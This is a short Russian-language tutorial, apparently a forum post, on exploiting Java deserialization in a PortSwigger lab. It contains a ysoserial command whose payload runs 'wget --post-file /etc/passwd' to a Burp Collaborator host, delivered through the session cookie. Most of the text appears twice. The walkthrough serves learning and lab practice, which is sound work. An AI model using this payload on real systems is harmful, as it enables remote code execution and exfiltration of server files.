Сериализация - процесс преобразования сложных структур данных, таких как объекты и их поля, в нормальный формат, который можно отправлять и получать в виде последовательного потока байтов.
Для тупых - большой и сложный запрос можна отправить в байтах
Десериализация - Процесс восстановления этого потока байтов в полностью функциональную копию исходного объекта в точном состоянии, в котором он был сериализован. Затем логика веб-сайта может взаимодействовать с этим десериализрованным объектом, как и с любым другим объектом.
Для тупых - Из байтов в норм вид
И так, юные падаваны спросят меня:
- Магистр Люк, ну и в чём уязвимость?
- Не проверяются данные при десериализации, в байтах код может быть вредоносный, мой юный падаван...
Рассмотрим поиск и эксплуатацию такой уязвимости:

Декодим url+base64+gzip

Понимаем, в каком порядке сервак принимает данные
Так как это java, я использовал ysoserial и колаборатор от бюрпа, попробуем прочитать /etc/passwd

Дальше мы берём это и енкодим все спецсимволы, я использовал cyberchef

Вставляем вместо наших cookie...

И получаем ответ от колаборатора

На этом всё, эксплуатация была проведена на тестовом стенде от portswigger...
Для тупых - большой и сложный запрос можна отправить в байтах
Десериализация - Процесс восстановления этого потока байтов в полностью функциональную копию исходного объекта в точном состоянии, в котором он был сериализован. Затем логика веб-сайта может взаимодействовать с этим десериализрованным объектом, как и с любым другим объектом.
Для тупых - Из байтов в норм вид
И так, юные падаваны спросят меня:
- Магистр Люк, ну и в чём уязвимость?
- Не проверяются данные при десериализации, в байтах код может быть вредоносный, мой юный падаван...
Рассмотрим поиск и эксплуатацию такой уязвимости:

Декодим url+base64+gzip

Понимаем, в каком порядке сервак принимает данные
Так как это java, я использовал ysoserial и колаборатор от бюрпа, попробуем прочитать /etc/passwd
Bash:
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'wget --post-file /etc/passwd uki3xdgu0t8bkn8uxqusn13e258wwl.burpcollaborator.net' | gzip -f | base64 -w0

Дальше мы берём это и енкодим все спецсимволы, я использовал cyberchef

Вставляем вместо наших cookie...

И получаем ответ от колаборатора

На этом всё, эксплуатация была проведена на тестовом стенде от portswigger...